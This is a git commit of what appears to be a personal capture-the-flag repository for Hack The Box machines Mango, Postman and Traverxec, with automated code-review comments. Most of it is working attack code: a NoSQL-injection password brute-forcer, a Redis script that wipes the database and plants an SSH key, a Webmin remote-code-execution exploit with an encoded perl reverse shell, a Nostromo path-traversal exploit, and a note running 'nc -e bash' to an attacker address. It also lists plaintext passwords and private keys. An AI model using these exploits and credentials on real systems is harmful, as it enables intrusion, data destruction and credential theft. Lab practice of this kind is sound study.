
Initial commit

Roman Hergenreder 3 years ago
cc2d470549

+ 7 - 0
machines/Mango/exploit.jjs

@@ -0,0 +1,7 @@
+var FileReader = Java.type("java.io.FileReader");
+var BufferedReader = Java.type("java.io.BufferedReader");
+var olinkfile = "/root/root.txt";
+var fr = new FileReader(olinkfile);
+var br = new BufferedReader(fr);
+print(br.readLine());
+br.close();
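Review bot: `br.close()` on the last line is skipped whenever `readLine()` throws, so the `FileReader`/`BufferedReader` pair is left open on the error path; wrap the read as `try { print(br.readLine()); } finally { br.close(); }`. The name `olinkfile` says nothing about what it holds — `path` or `target` would read better. The file has no header comment, so a reader has to infer from the extension that it is a Nashorn script; a one-liner such as `// jjs script: prints the first line of the file named in olinkfile` would make that explicit.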

+ 25 - 0
machines/Mango/exploit.py

@@ -0,0 +1,25 @@
+import requests
+import string
+
+username="mango"
+password=""
+url="http://staging-order.mango.htb/index.php"
+
+restart = True
+characters = list(string.ascii_letters + string.digits + "!&@#%_:;}]~")
+characters = characters + ["\\" + c for c in ".^$*+()[{\\|?"]
+
+while restart:
+    restart = False
+
+    for i in characters:
+        payload = password + i
+        print("trying:", payload)
+        post_data = {'username': 'mango', 'password[$regex]': '^' + payload + ".*", 'login': 'login'}
+        r = requests.post(url, data=post_data, allow_redirects=False)
+
+        # A correct password means we get a 302 redirect
+        if r.status_code == 302:
+            print(payload)
+            restart = True
+            password = password + i
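Review bot: The `username` variable assigned at the top is never used — the `post_data` dict hard-codes `'username': 'mango'`, so editing the variable silently has no effect; use `'username': username` in the dict. The `requests.post` call has no `timeout=`, so one stalled connection hangs the loop forever; `requests.post(url, data=post_data, allow_redirects=False, timeout=10)` bounds it. A short header comment would also help the next reader: it should say that a 302 on the login is what the loop treats as a match, and that the `password` it prints still carries the backslashes that were added for regex metacharacters.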

+ 36 - 0
machines/Mango/machine

@@ -0,0 +1,36 @@
+IP-Address: 10.10.10.162
+Linux mango 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+
+Logins:
+  - mango:h3mXK8RhU~f{]f5H (ssh, http)
+  - admin:t9KcS3>!0B#2 (su, http) (found in mongoDB)
+
+root flag: use jjs
+
+Ports:
+22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
+|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
+|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
+80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: 403 Forbidden
+443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: 400 Bad Request
+| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
+| Not valid before: 2019-09-27T14:21:19
+|_Not valid after:  2020-09-26T14:21:19
+|_ssl-date: TLS randomness does not represent time
+| tls-alpn:
+|_  http/1.1
+
+http urls:
+ - /index.php (Status: 200)
+ - /analytics.php (Status: 200)
+ - /server-status (Status: 403)
+
+http://staging-order.mango.htb:
+  - /index.php (200)
+  - /home.php (302)

+ 68 - 0
machines/Postman/exploit.py

@@ -0,0 +1,68 @@
+import os
+import sys
+import subprocess
+import re
+
+if len(sys.argv) < 3:
+    print("Invalid Usage: %s <host> <pub key> [username] [remote path]" % sys.argv[0])
+    exit(1)
+
+host = sys.argv[1]
+pub_key = sys.argv[2]
+username = 'redis' if len(sys.argv) < 4 else sys.argv[3]
+remote_path = "/var/lib/redis/.ssh/" if len(sys.argv) < 5 else sys.argv[4]
+
+if pub_key.endswith(".pub"):
+    priv_key = pub_key[:-4]
+    if not os.path.isfile(priv_key):
+        print("Private key not found:", priv_key)
+        exit(1)
+else:
+    print("Public key does not end with .pub, i don't know where to find the private key")
+    exit(1)
+
+def resolveRedisPath():
+    bin = "redis-cli"
+    proc = subprocess.Popen(["whereis", bin], stdout=subprocess.PIPE)
+    (out,err) = proc.communicate()
+    proc.wait()
+    if out:
+        out = out.decode("UTF-8").strip()[len(bin)+2:]
+        path = out.split(" ")
+        if path:
+            return path[0]
+
+def getPayload():
+    with open(pub_key, "r") as f:
+        data = f.read().strip()
+        return "\n\n%s\n\n\r\n\n" % data
+
+PATH = resolveRedisPath()
+if PATH and os.path.isfile(PATH):
+    try:
+        print('*******************************************************************')
+        print('* [+] [Exploit] Exploiting misconfigured REDIS SERVER*             ')
+        print('* [+] AVINASH KUMAR THAPA aka "-Acid"                              ')
+        print('*******************************************************************')
+        print()
+        print("[~] Deleting previous keys")
+        os.system("%s -h %s flushall" % (PATH, host))
+        print("[~] Setting public key")
+        prefix = "%s -h %s" % (PATH, host)
+        payload = getPayload()
+        os.system("echo -n -e '%s' | %s -x set cracklist" % (payload, prefix))
+        print("[~] Setting backup file")
+        os.system("%s config set dbfilename \"backup.db\"" % prefix)
+        print("[~] Setting target directory")
+        os.system("%s config set dir %s" % (prefix, remote_path))
+        print("[~] Setting authorized_keys")
+        os.system("%s config set dbfilename \"authorized_keys\"" % prefix)
+        print("[~] Saving")
+        os.system("%s save" % prefix)
+        print("[~] Connecting SSH")
+        os.system("ssh -oPreferredAuthentications=publickey -i %s %s@%s" % (priv_key, username, host))
+
+    except Exception as e:
+        print("Something went wrong:", e)
+else:
+    print("Redis-cli:::::This utility is not present on your system. You need to install it to proceed further.")
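Review bot: The shell strings built with `%` and passed to `os.system` at the `flushall`, `set cracklist`, `config set dir` and `ssh` lines splice `host`, `remote_path`, `priv_key` and the full key-file contents straight into a command line, so a path containing a space or a quote character in the key file breaks or alters the command; build each call as an argument list for `subprocess.run([...])` and hand the key text over via `input=` instead of `echo -n -e`. `resolveRedisPath` re-implements what the standard library already offers — `PATH = shutil.which("redis-cli")` (with `import shutil`) replaces the whole `whereis` output parsing, and its local `bin` shadows a builtin. The `try`/`except Exception` around the `os.system` calls never fires because `os.system` returns an exit status rather than raising, so a failing step is silently ignored; check each return value. Finally, `flushall` destroys every key in the target instance before anything else happens and the script neither warns nor offers a dry-run; that should at least be stated in a header comment.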

+ 0 - 0
machines/Postman/hash


+ 30 - 0
machines/Postman/id_rsa.bak

@@ -0,0 +1,30 @@
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
+
+JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
+cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
+7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
+cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
+1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
+EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
+UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
+Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
+t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
+5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
+P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
+jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
+SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
+l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
+0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
+S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
+hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
+Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
+XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
+b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
+WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
+KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
+npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
+VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
+X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
+-----END RSA PRIVATE KEY-----

+ 26 - 0
machines/Postman/machine

@@ -0,0 +1,26 @@
+IP-Address: 10.10.10.160
+
+Ports:
+22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
+|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
+|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
+80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: The Cyber Geek's Personal Website
+6379/tcp  open  redis   Redis key-value store
+10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
+|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
+
+Logins:
+ - Matt:computer2008 (ssh passphrase,user)
+
+# User:
+# 1. redis exploit
+# 2. /opt/id_rsa.bak
+# 3. crack passphrase, use as su Matt
+
+# Root:
+# nc -lvvp 4444
+# webmin_exploit.py

+ 71 - 0
machines/Postman/webmin_exploit.py

@@ -0,0 +1,71 @@
+#!/usr/bin/env python2
+# -*- coding: utf8 -*-
+import requests
+import urllib3
+urllib3.disable_warnings()
+import argparse
+import sys
+from termcolor import colored
+
+
+arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
+arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
+arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
+arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
+arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
+arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
+arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
+arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
+arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)
+args = arg_parser.parse_args()
+
+# proxy set for test
+proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
+# retrieve the Cookies sid:
+print colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue")
+print colored('*********************************************************************************************', "blue")
+print colored('*********************************************************************************************', "blue")
+print colored('*********************************************************************************************', "blue")
+print colored('****************************** Retrieve Cookies sid *****************************************', "blue")
+
+req={'page':'','user':args.user,'pass':args.password}
+if args.ssl.lower() in ('yes', 'true', 't', 'y', '1'):
+   url="https://"+args.rhost+":"+str(args.rport)+args.targeturi
+else:
+   url="http://"+args.rhost+":"+str(args.rport)+args.targeturi
+
+resu=requests.post(url+"session_login.cgi",data=req, cookies={"testing":"1"}, verify=False, allow_redirects=False)
+if "This web server is running in SSL mode" in resu.content:
+    print colored('********** [+] [Exploit][ERROR] Enable the ssl arg !!', "red")
+    print(resu.content)
+    sys.exit(1)
+if "sid" in resu.headers['Set-Cookie']:
+   sid= resu.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip()
+   print("\n")
+   print colored('********** [+] [Exploit] The Cookie is '+sid, "green")
+else:
+   print colored('********** [+] [Exploit][ERROR] The authentication to the webmin server failed', "red")
+   sys.exit(1)
+
+print("")
+print colored('********************************************************************************************', "blue")
+print colored('****************************** Create payload and Exploit ***********************************', "blue")
+print("\n")
+
+# Templateofthe payload 
+template="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\""+args.lhost+":"+str(args.lport)+"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
+b64payload = template.encode('base64').replace('\n', '').strip()
+payload=' | bash -c "{echo,'+b64payload+'}|{base64,-d}|{bash,-i}"'
+
+## request the payload
+req={'u':['acl/apt',payload]}
+headers= {'Connection': 'close','referer': url+"package-updates/?xnavigation=1"}
+
+try:
+  resu=requests.post(url+"package-updates/update.cgi",data=req, cookies={"sid":sid}, verify=False, allow_redirects=False, headers=headers, timeout=10)
+except requests.Timeout:
+    pass
+except requests.ConnectionError:
+    pass
+print('\n')
+print colored('********** [+] [Exploit] Verify you nc listener on port '+str(args.lport)+' for the incomming reverse shell', "green")
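Review bot: The `resu.headers['Set-Cookie']` lookup raises `KeyError` when the login response sets no cookie at all, which is precisely the failed-authentication case the `else` branch is meant to report; use `resu.headers.get('Set-Cookie', '')` so that branch is actually reached. The `proxies` dict under `# proxy set for test` is never passed to any request, so it is dead code and should be removed or wired to a flag. The file depends on Python 2 syntax (`print colored(...)`, `.encode('base64')`) while the sibling Mango script targets Python 3, so the shebang is the only hint; a header comment naming the interpreter requirement and the third-party `termcolor` dependency would make that explicit.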

machines/Traverxec/backup-ssh-identiy-files.tgz


+ 34 - 0
machines/Traverxec/exploit.py

@@ -0,0 +1,34 @@
+#!/usr/bin/env python
+
+import socket
+import argparse
+
+parser = argparse.ArgumentParser(description='RCE in Nostromo web server through 1.9.6 due to path traversal.')
+parser.add_argument('host',help='domain/IP of the Nostromo web server')
+parser.add_argument('port',help='port number',type=int)
+parser.add_argument('cmd',help='command to execute, default is id',default='id',nargs='?')
+args = parser.parse_args()
+
+def recv(s):
+	r=''
+	try:
+		while True:
+			t=s.recv(1024)
+			if len(t)==0:
+				break
+			r+=t
+	except:
+		pass
+	return r
+
+def exploit(host,port,cmd):
+	s = socket.socket()
+	s.settimeout(1)
+	s.connect((host,int(port)))
+	payload = """POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
+	s.send(payload)
+	r = recv(s)
+	r = r[r.index('\r\n\r\n')+4:]
+	print r
+
+exploit(args.host,args.port,args.cmd)
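Review bot: The bare `except:` in `recv` swallows every exception, including `KeyboardInterrupt`, and appears to exist only for the read timeout set by `s.settimeout(1)`; narrow it to `except socket.timeout:` so other errors surface. In `exploit` the socket is never closed and `r.index('\r\n\r\n')` raises `ValueError` when the response has no header terminator (for example an empty reply after the timeout), so the user sees an index failure instead of a clear "no response"; guard with `if '\r\n\r\n' in r:` and close the socket in a `finally`. The shebang says plain `python` while the code is Python 2 only (`print r`, `s.send` of a `str`) and the machine notes in this commit invoke it as `python2`; the shebang should match.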

+ 0 - 0
machines/Traverxec/hash


+ 30 - 0
machines/Traverxec/id_rsa

@@ -0,0 +1,30 @@
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
+
+seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
+tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
+KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
+RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
+HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
+Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
+dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
+6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
+xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
+Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
+i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
+fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
+bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
+uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
+Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
+9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
+rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
+4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
+/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
+JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
+XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
+hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
+SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
+j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
+VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
+-----END RSA PRIVATE KEY-----

+ 1 - 0
machines/Traverxec/id_rsa.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec

+ 0 - 0
machines/Traverxec/id_rsa_hash


+ 15 - 0
machines/Traverxec/machine

@@ -0,0 +1,15 @@
+IP-Address: 10.10.10.165
+
+# 1. www-data shell:
+# python2 exploit.py 10.10.10.165 80 'nc -e bash 10.10.14.2 9999'
+
+# 2. sudo journalctl -n5 -unstromo.service (with small window)
+#    !/bin/sh
+
+Ports:
+  - 22 (ssh)
+  - 80 (nostromo 1.9.6)
+
+Logins:
+ - david:Nowonly4me (?)
+ - hunter (ssh passphrase)
